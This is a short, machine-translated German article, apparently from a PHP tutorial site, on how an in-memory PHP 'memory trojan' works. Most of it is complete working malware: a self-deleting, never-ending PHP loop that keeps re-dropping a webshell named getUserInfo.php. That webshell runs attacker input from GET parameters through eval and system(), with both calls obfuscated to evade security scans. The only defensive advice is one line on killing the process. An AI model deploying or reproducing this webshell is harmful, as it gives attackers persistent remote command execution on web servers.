Nehmen Sie an der Analyse des Implementierungsprinzips des PHP-Speichertrojanervirus teil

Vorwort

Speichertrojaner sind Trojanerviren, die im Speicher laufen und keine Codeeinheit haben. Speichertrojaner sind gut versteckt, schwer zu erkennen und nicht zu töten (allgemein bekannt als unsterbliche Pferde).

Die Netzwerksicherheitsbranche hat einen starken Fasseffekt. Das System kämpft gegen Black Hats, und der Ausgang hängt vom schwächsten Glied in der Sicherheit ab. Black Hat versus White Hat, das Ergebnis hängt vom Grad des Angriffs und dem Grad der Verschleierung und Zerstörung ab.

Im Haupttext wird nicht darauf eingegangen, ob ein Stück Schadcode aufgrund willkürlicher Datei-Uploads oder quellennaher Angriffe auf den Produktionsserver zugegriffen werden konnte.

Virus-Quellcode (sehr einfach)

<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = &#39;./getUserInfo.php&#39;;
//死循环常驻内存。释放木马文件
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode(&#39;PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=&#39;));
 sleep(60);
}

Den Viruskörper freigeben

<?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET[&#39;e&#39;]);
if($e = @$_GET[&#39;e&#39;]) {
    $func = @create_function(null, base64_decode(&#39;ZXZhbCgi&#39;) . $e . base64_decode(&#39;Iik7&#39;));
    $func();
}
//system($_GET[&#39;s&#39;]);
if($s = @$_GET[&#39;s&#39;]) {
    $f = str_replace(&#39;x&#39;, &#39;&#39;, &#39;xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx&#39;);
    $f($s);
}

Anleitung

• Die oben genannten sensiblen Schlüsselcodes sind codiert, um verschiedene Sicherheitsscans zu vermeiden.

• Sobald das Virenbeispiel ausgeführt wird, löscht es sich selbst und läuft für lange Zeit im Speicher.

• Auch wenn der veröffentlichte Trojaner erkannt und gelöscht wird, werden weiterhin dieselben Dateien generiert.

Lösung

Nachdem Sie den Prozess beendet haben, löschen Sie die freigegebenen Trojanerdateien.

Empfohlen: „PHP-Video-Tutorial“

Das obige ist der detaillierte Inhalt vonNehmen Sie an der Analyse des Implementierungsprinzips des PHP-Speichertrojanervirus teil. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!